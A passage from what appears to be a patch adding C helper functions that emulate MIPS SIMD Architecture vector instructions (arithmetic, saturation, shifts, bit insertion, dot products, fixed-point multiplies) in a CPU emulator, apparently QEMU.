arg1 : arg2; +} + +#define MSA_BINOP_IMM_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws, int32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_IMM_DF(addvi, addv) +MSA_BINOP_IMM_DF(subvi, subv) +MSA_BINOP_IMM_DF(ceqi, ceq) +MSA_BINOP_IMM_DF(clei_s, cle_s) +MSA_BINOP_IMM_DF(clei_u, cle_u) +MSA_BINOP_IMM_DF(clti_s, clt_s) +MSA_BINOP_IMM_DF(clti_u, clt_u) +MSA_BINOP_IMM_DF(maxi_s, max_s) +MSA_BINOP_IMM_DF(maxi_u, max_u) +MSA_BINOP_IMM_DF(mini_s, min_s) +MSA_BINOP_IMM_DF(mini_u, min_u) +#undef MSA_BINOP_IMM_DF + +void helper_msa_ldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = (int8_t)s10; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = (int16_t)s10; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = (int32_t)s10; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = (int64_t)s10; + } + break; + default: + assert(0); + } +} + +/* Data format bit position and unsigned values */ +#define BIT_POSITION(x, df) 
((uint64_t)(x) % DF_BITS(df)) + +static inline int64_t msa_sll_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return arg1 << b_arg2; +} + +static inline int64_t msa_sra_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return arg1 >> b_arg2; +} + +static inline int64_t msa_srl_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + int32_t b_arg2 = BIT_POSITION(arg2, df); + return u_arg1 >> b_arg2; +} + +static inline int64_t msa_bclr_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 & (~(1LL << b_arg2)), df); +} + +static inline int64_t msa_bset_df(uint32_t df, int64_t arg1, + int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 | (1LL << b_arg2), df); +} + +static inline int64_t msa_bneg_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 ^ (1LL << b_arg2), df); +} + +static inline int64_t msa_binsl_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_dest = UNSIGNED(dest, df); + int32_t sh_d = BIT_POSITION(arg2, df) + 1; + int32_t sh_a = DF_BITS(df) - sh_d; + if (sh_d == DF_BITS(df)) { + return u_arg1; + } else { + return UNSIGNED(UNSIGNED(u_dest << sh_d, df) >> sh_d, df) | + UNSIGNED(UNSIGNED(u_arg1 >> sh_a, df) << sh_a, df); + } +} + +static inline int64_t msa_binsr_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_dest = UNSIGNED(dest, df); + int32_t sh_d = BIT_POSITION(arg2, df) + 1; + int32_t sh_a = DF_BITS(df) - sh_d; + if (sh_d == DF_BITS(df)) { + return u_arg1; + } else { + return UNSIGNED(UNSIGNED(u_dest >> sh_d, df) << sh_d, df) | + UNSIGNED(UNSIGNED(u_arg1 << sh_a, df) >> sh_a, df); + } +} + +static inline int64_t msa_sat_s_df(uint32_t df, int64_t arg, 
uint32_t m) +{ + return arg < M_MIN_INT(m+1) ? M_MIN_INT(m+1) : + arg > M_MAX_INT(m+1) ? M_MAX_INT(m+1) : + arg; +} + +static inline int64_t msa_sat_u_df(uint32_t df, int64_t arg, uint32_t m) +{ + uint64_t u_arg = UNSIGNED(arg, df); + return u_arg < M_MAX_UINT(m+1) ? u_arg : + M_MAX_UINT(m+1); +} + +static inline int64_t msa_srar_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + if (b_arg2 == 0) { + return arg1; + } else { + int64_t r_bit = (arg1 >> (b_arg2 - 1)) & 1; + return (arg1 >> b_arg2) + r_bit; + } +} + +static inline int64_t msa_srlr_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + int32_t b_arg2 = BIT_POSITION(arg2, df); + if (b_arg2 == 0) { + return u_arg1; + } else { + uint64_t r_bit = (u_arg1 >> (b_arg2 - 1)) & 1; + return (u_arg1 >> b_arg2) + r_bit; + } +} + +#define MSA_BINOP_IMMU_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_IMMU_DF(slli, sll) +MSA_BINOP_IMMU_DF(srai, sra) +MSA_BINOP_IMMU_DF(srli, srl) +MSA_BINOP_IMMU_DF(bclri, bclr) +MSA_BINOP_IMMU_DF(bseti, bset) +MSA_BINOP_IMMU_DF(bnegi, bneg) +MSA_BINOP_IMMU_DF(sat_s, sat_s) 
+MSA_BINOP_IMMU_DF(sat_u, sat_u) +MSA_BINOP_IMMU_DF(srari, srar) +MSA_BINOP_IMMU_DF(srlri, srlr) +#undef MSA_BINOP_IMMU_DF + +#define MSA_TEROP_IMMU_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws, uint32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ + u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ + u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ + u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ + u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_TEROP_IMMU_DF(binsli, binsl) +MSA_TEROP_IMMU_DF(binsri, binsr) +#undef MSA_TEROP_IMMU_DF + +static inline int64_t msa_max_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 > abs_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 < abs_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_add_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 + abs_arg2; +} + +static inline int64_t msa_adds_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t max_int = (uint64_t)DF_MAX_INT(df); + uint64_t abs_arg1 = arg1 >= 0 ? 
arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + if (abs_arg1 > max_int || abs_arg2 > max_int) { + return (int64_t)max_int; + } else { + return (abs_arg1 < max_int - abs_arg2) ? abs_arg1 + abs_arg2 : max_int; + } +} + +static inline int64_t msa_adds_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (arg1 < 0) { + return (min_int - arg1 < arg2) ? arg1 + arg2 : min_int; + } else { + return (arg2 < max_int - arg1) ? arg1 + arg2 : max_int; + } +} + +static inline uint64_t msa_adds_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t max_uint = DF_MAX_UINT(df); + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return (u_arg1 < max_uint - u_arg2) ? u_arg1 + u_arg2 : max_uint; +} + +static inline int64_t msa_ave_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed shift */ + return (arg1 >> 1) + (arg2 >> 1) + (arg1 & arg2 & 1); +} + +static inline uint64_t msa_ave_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned shift */ + return (u_arg1 >> 1) + (u_arg2 >> 1) + (u_arg1 & u_arg2 & 1); +} + +static inline int64_t msa_aver_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed shift */ + return (arg1 >> 1) + (arg2 >> 1) + ((arg1 | arg2) & 1); +} + +static inline uint64_t msa_aver_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned shift */ + return (u_arg1 >> 1) + (u_arg2 >> 1) + ((u_arg1 | u_arg2) & 1); +} + +static inline int64_t msa_subs_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (arg2 > 0) { + return (min_int + arg2 < arg1) ? arg1 - arg2 : min_int; + } else { + return (arg1 < max_int + arg2) ? 
arg1 - arg2 : max_int; + } +} + +static inline int64_t msa_subs_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return (u_arg1 > u_arg2) ? u_arg1 - u_arg2 : 0; +} + +static inline int64_t msa_subsus_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t max_uint = DF_MAX_UINT(df); + if (arg2 >= 0) { + uint64_t u_arg2 = (uint64_t)arg2; + return (u_arg1 > u_arg2) ? + (int64_t)(u_arg1 - u_arg2) : + 0; + } else { + uint64_t u_arg2 = (uint64_t)(-arg2); + return (u_arg1 < max_uint - u_arg2) ? + (int64_t)(u_arg1 + u_arg2) : + (int64_t)max_uint; + } +} + +static inline int64_t msa_subsuu_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (u_arg1 > u_arg2) { + return u_arg1 - u_arg2 < (uint64_t)max_int ? + (int64_t)(u_arg1 - u_arg2) : + max_int; + } else { + return u_arg2 - u_arg1 < (uint64_t)(-min_int) ? + (int64_t)(u_arg1 - u_arg2) : + min_int; + } +} + +static inline int64_t msa_asub_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed compare */ + return (arg1 < arg2) ? + (uint64_t)(arg2 - arg1) : (uint64_t)(arg1 - arg2); +} + +static inline uint64_t msa_asub_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned compare */ + return (u_arg1 < u_arg2) ? + (uint64_t)(u_arg2 - u_arg1) : (uint64_t)(u_arg1 - u_arg2); +} + +static inline int64_t msa_mulv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 * arg2; +} + +static inline int64_t msa_div_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + if (arg1 == DF_MIN_INT(df) && arg2 == -1) { + return DF_MIN_INT(df); + } + return arg2 ? 
arg1 / arg2 : 0; +} + +static inline int64_t msa_div_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg2 ? u_arg1 / u_arg2 : 0; +} + +static inline int64_t msa_mod_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + if (arg1 == DF_MIN_INT(df) && arg2 == -1) { + return 0; + } + return arg2 ? arg1 % arg2 : 0; +} + +static inline int64_t msa_mod_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg2 ? u_arg1 % u_arg2 : 0; +} + +#define SIGNED_EVEN(a, df) \ + ((((int64_t)(a)) << (64 - DF_BITS(df)/2)) >> (64 - DF_BITS(df)/2)) + +#define UNSIGNED_EVEN(a, df) \ + ((((uint64_t)(a)) << (64 - DF_BITS(df)/2)) >> (64 - DF_BITS(df)/2)) + +#define SIGNED_ODD(a, df) \ + ((((int64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df)/2)) + +#define UNSIGNED_ODD(a, df) \ + ((((uint64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df)/2)) + +#define SIGNED_EXTRACT(e, o, a, df) \ + do { \ + e = SIGNED_EVEN(a, df); \ + o = SIGNED_ODD(a, df); \ + } while (0); + +#define UNSIGNED_EXTRACT(e, o, a, df) \ + do { \ + e = UNSIGNED_EVEN(a, df); \ + o = UNSIGNED_ODD(a, df); \ + } while (0); + +static inline int64_t msa_dotp_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dotp_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +#define CONCATENATE_AND_SLIDE(s, k) \ + do { \ + for (i = 0; i < s; i++) { \ + v[i] = 
pws->b[s * k + i]; \ + v[i + s] = pwd->b[s * k + i]; \ + } \ + for (i = 0; i < s; i++) { \ + pwd->b[s * k + i] = v[i + n]; \ + } \ + } while (0) + +static inline void msa_sld_df(uint32_t df, wr_t *pwd, + wr_t *pws, target_ulong rt) +{ + uint32_t n = rt % DF_ELEMENTS(df); + uint8_t v[64]; + uint32_t i, k; + + switch (df) { + case DF_BYTE: + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_BYTE), 0); + break; + case DF_HALF: + for (k = 0; k < 2; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_HALF), k); + } + break; + case DF_WORD: + for (k = 0; k < 4; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_WORD), k); + } + break; + case DF_DOUBLE: + for (k = 0; k < 8; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_DOUBLE), k); + } + break; + default: + assert(0); + } +} + +static inline int64_t msa_hadd_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return SIGNED_ODD(arg1, df) + SIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hadd_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return UNSIGNED_ODD(arg1, df) + UNSIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hsub_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return SIGNED_ODD(arg1, df) - SIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hsub_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return UNSIGNED_ODD(arg1, df) - UNSIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_mul_q_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t q_min = DF_MIN_INT(df); + int64_t q_max = DF_MAX_INT(df); + + if (arg1 == q_min && arg2 == q_min) { + return q_max; + } + return (arg1 * arg2) >> (DF_BITS(df) - 1); +} + +static inline int64_t msa_mulr_q_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t q_min = DF_MIN_INT(df); + int64_t q_max = DF_MAX_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + if (arg1 == q_min && arg2 == q_min) { + return q_max; + } + return (arg1 * arg2 + r_bit) >> (DF_BITS(df) - 1); +} + +#define MSA_BINOP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t 
df, \ + uint32_t wd, uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], pwt->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], pwt->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], pwt->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], pwt->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_DF(sll) +MSA_BINOP_DF(sra) +MSA_BINOP_DF(srl) +MSA_BINOP_DF(bclr) +MSA_BINOP_DF(bset) +MSA_BINOP_DF(bneg) +MSA_BINOP_DF(addv) +MSA_BINOP_DF(subv) +MSA_BINOP_DF(max_s) +MSA_BINOP_DF(max_u) +MSA_BINOP_DF(min_s) +MSA_BINOP_DF(min_u) +MSA_BINOP_DF(max_a) +MSA_BINOP_DF(min_a) +MSA_BINOP_DF(ceq) +MSA_BINOP_DF(clt_s) +MSA_BINOP_DF(clt_u) +MSA_BINOP_DF(cle_s) +MSA_BINOP_DF(cle_u) +MSA_BINOP_DF(add_a) +MSA_BINOP_DF(adds_a) +MSA_BINOP_DF(adds_s) +MSA_BINOP_DF(adds_u) +MSA_BINOP_DF(ave_s) +MSA_BINOP_DF(ave_u) +MSA_BINOP_DF(aver_s) +MSA_BINOP_DF(aver_u) +MSA_BINOP_DF(subs_s) +MSA_BINOP_DF(subs_u) +MSA_BINOP_DF(subsus_u) +MSA_BINOP_DF(subsuu_s) +MSA_BINOP_DF(asub_s) +MSA_BINOP_DF(asub_u) +MSA_BINOP_DF(mulv) +MSA_BINOP_DF(div_s) +MSA_BINOP_DF(div_u) +MSA_BINOP_DF(mod_s) +MSA_BINOP_DF(mod_u) +MSA_BINOP_DF(dotp_s) +MSA_BINOP_DF(dotp_u) +MSA_BINOP_DF(srar) +MSA_BINOP_DF(srlr) +MSA_BINOP_DF(hadd_s) +MSA_BINOP_DF(hadd_u) +MSA_BINOP_DF(hsub_s) +MSA_BINOP_DF(hsub_u) + +MSA_BINOP_DF(mul_q) +MSA_BINOP_DF(mulr_q) +#undef MSA_BINOP_DF + +void helper_msa_sld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t rt) 
+{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_sld_df(df, pwd, pws, env->active_tc.gpr[rt]); +} + +static inline int64_t msa_maddv_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + return dest + arg1 * arg2; +} + +static inline int64_t msa_msubv_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + return dest - arg1 * arg2; +} + +static inline int64_t msa_dpadd_s_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dpadd_u_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dpsub_s_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); +} + +static inline int64_t msa_dpsub_u_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); +} + +static inline int64_t msa_madd_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = 
DF_MIN_INT(df); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_msub_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_maddr_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod + r_bit) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_msubr_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod + r_bit) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? 
q_max : q_ret; +} + +#define MSA_TEROP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ + pwt->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ + pwt->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ + pwt->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ + pwt->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_TEROP_DF(maddv) +MSA_TEROP_DF(msubv) +MSA_TEROP_DF(dpadd_s) +MSA_TEROP_DF(dpadd_u) +MSA_TEROP_DF(dpsub_s) +MSA_TEROP_DF(dpsub_u) +MSA_TEROP_DF(binsl) +MSA_TEROP_DF(binsr) +MSA_TEROP_DF(madd_q) +MSA_TEROP_DF(msub_q) +MSA_TEROP_DF(maddr_q) +MSA_TEROP_DF(msubr_q) +#undef MSA_TEROP_DF + +static inline void msa_splat_df(uint32_t df, wr_t *pwd, + wr_t *pws, target_ulong rt) +{ + uint32_t n = rt % DF_ELEMENTS(df); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = pws->b[n]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = pws->h[n]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = pws->w[n]; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = pws->d[n]; + } + break; + default: + assert(0); + } +} + +void helper_msa_splat_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + 
